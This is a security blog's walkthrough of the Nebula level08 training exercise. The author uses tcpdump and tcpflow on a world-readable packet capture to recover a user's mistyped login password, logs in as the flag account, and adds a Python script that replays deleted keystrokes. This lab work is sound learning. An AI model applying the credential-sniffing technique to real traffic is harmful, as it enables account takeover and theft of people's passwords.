Mike-Boya

Information Security and Programming Blog

Exploit Exercises - Nebula Level08

“World readable files strike again. Check what that user was up to, and use it to log into flag08 account.”

This was the verbiage provided in the About section for level08.

The first step I took was to check the home directory for flag08.

    level08@nebula:/home/flag08$ ls -l
    total 9
    -rw-r--r-- 1 root root 8302 2011-11-20 21:22 capture.pcap

It contained a world-readable capture file, so let’s see what “the user was up to.” I ran the capture file through tcpdump to search for any credentials:

    level08@nebula:/home/flag08$ tcpdump -nnAr capture.pcap | grep -i pass
    reading from file capture.pcap, link-type EN10MB (Ethernet)
    Password: 

It appears that a password is mentioned in the output. I could move capture.pcap off the system and run it through Wireshark to follow the TCP stream, but decided to stick to the command line.

I used the tool tcpflow to follow the user’s activity:

    level08@nebula:/home/flag08$ tcpflow -C -r capture.pcap
    ..%
    ..%
    ..&..... ..#..'..$
    ..&..... ..#..'..$
    .. .....#.....'.........
    .. .38400,38400....#.SodaCan:0....'..DISPLAY.SodaCan:0......xterm..
    ........"........!
    ........"..".....b........b.....B.
    ..............................1.......!
    .."....
    .."....
    ..!..........."
    ........"
    .."................
    .....................

    Linux 2.6.38-8-generic-pae (::ffff:10.1.1.2) (pts/10)

    ..wwwbugs login:
    l
    .l
    e
    .e
    v
    .v
    e
    .e
    l
    .l
    8
    .8

    .
    .
    Password:
    b
    a
    c
    k
    d
    o
    o
    r
    .
    .
    .
    0
    0
    R
    m
    8
    .
    a
    t
    e

    .

    .
    .
    Login incorrect
    wwwbugs login:

The capture caught the user attempting to log in to wwwbugs. The login was incorrect, but may have been mistyped.

The output contains a few deletions, which confirms that the user had forgotten some details like “m8” vs. “mate.” Let’s try to log in using “backd00Rmate”:

    level08@nebula:/home/flag08$ su flag08
    Password:
    sh-4.2$ id
    uid=991(flag08) gid=991(flag08) groups=991(flag08)
    sh-4.2$ getflag
    You have successfully executed getflag on a target account

Looks like the password I chose was correct. The tricky part of this challenge was finding the “login incorrect” statement, which steered me away from using other combinations of “backdoor…00Rm8.ate”.
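The deletion replay described above, as an added example that is not part of the original post: it applies erase keystrokes to a client-side keystroke stream the way a tty line editor would, next to the dotted view a console dump gives. The sample bytes are constructed from the output shown above, the reading of each dot in the password as a DEL (0x7f) byte is an assumption, and the backspace, Ctrl-U and Ctrl-W handling goes beyond what this capture needs.

```python
# Added example: replay captured keystrokes through tty-style line editing.
DEL, BS, KILL, WERASE = 0x7F, 0x08, 0x15, 0x17  # erase, erase, Ctrl-U, Ctrl-W
CR, LF = 0x0D, 0x0A


def as_printed(stream: bytes) -> str:
    """What a console dump shows: every non-printable byte becomes a dot."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in stream)


def replay_keystrokes(stream: bytes) -> list[str]:
    """Return the lines the remote side received once edits are applied."""
    lines, buf, prev = [], [], None
    for byte in stream:
        if byte in (DEL, BS):
            if buf:                      # erasing on an empty line is a no-op
                buf.pop()
        elif byte == KILL:               # Ctrl-U discards the whole line
            buf.clear()
        elif byte == WERASE:             # Ctrl-W discards the last word
            while buf and buf[-1] == " ":
                buf.pop()
            while buf and buf[-1] != " ":
                buf.pop()
        elif byte == CR or (byte == LF and prev != CR):
            lines.append("".join(buf))   # Enter: the line is submitted
            buf.clear()
        elif 0x20 <= byte < 0x7F:
            buf.append(chr(byte))
        # NUL, the LF of a CR LF pair and other control bytes are dropped
        prev = byte
    if buf:
        lines.append("".join(buf))       # unterminated trailing input
    return lines


# Constructed sample: the password keystrokes from the output above, with
# each dot between the letters assumed to be a DEL byte, ended by CR NUL.
SAMPLE = b"backdoor\x7f\x7f\x7f00Rm8\x7fate\r\x00"

if __name__ == "__main__":
    print("as dumped  :", as_printed(SAMPLE))
    print("as received:", replay_keystrokes(SAMPLE))
```
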

Mike